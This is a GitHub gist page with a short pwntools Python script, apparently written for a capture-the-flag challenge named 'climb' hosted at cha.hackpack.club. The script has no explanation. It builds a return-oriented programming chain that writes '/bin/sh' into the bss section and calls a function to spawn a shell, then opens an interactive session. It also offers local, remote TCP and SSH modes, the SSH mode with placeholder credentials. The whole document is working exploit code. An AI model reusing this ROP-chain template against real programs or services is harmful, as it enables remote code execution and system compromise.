Skip to content

Instantly share code, notes, and snippets.

@tunelko

tunelko/basicrop.py

Created July 18, 2020 09:36
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save tunelko/b61d9424adf3656c92b510518144bf18 to your computer and use it in GitHub Desktop.
Save tunelko/b61d9424adf3656c92b510518144bf18 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
basicrop.py
from pwn import *
context(arch='x86_64', os='linux')
context.terminal = ['tmux', 'splitw', '-h']
LOCAL = False
REMOTETTCP = True
REMOTESSH = False
GDB = False
local_bin = "./climb"
if LOCAL:
p = process(local_bin)
elf = ELF(local_bin)
rop = ROP(elf)
elif REMOTETTCP:
p = remote('cha.hackpack.club',41702)
elf = ELF(local_bin)
rop = ROP(elf)
elif REMOTESSH:
ssh_shell = ssh('user', 'server.ssh', password='password', port=22)
p = ssh_shell.process(remote_bin)
elf = ELF(local_bin)
rop = ROP(elf)
if GDB and not REMOTETTCP and not REMOTESSH:
# attach gdb
gdb.attach(p.pid, "continue")
POP_RAX = (rop.find_gadget(['pop rax', 'ret']))[0]
POP_RDX = (rop.find_gadget(['pop rdx', 'ret']))[0]
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0]
call_me = elf.symbols['call_me']
payload = cyclic(40)
payload += p64(POP_RAX) + '/bin/sh\x00'
payload += p64(POP_RDX) + p64(elf.bss(100))
payload += p64(0x0040065d)
payload += p64(POP_RDI) + p64(elf.bss(100))
payload += p64(call_me)
# rop-chain payload
p.sendlineafter("respond?", payload)
print(p.clean())
p.sendline(payload)
p.interactive()
exit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment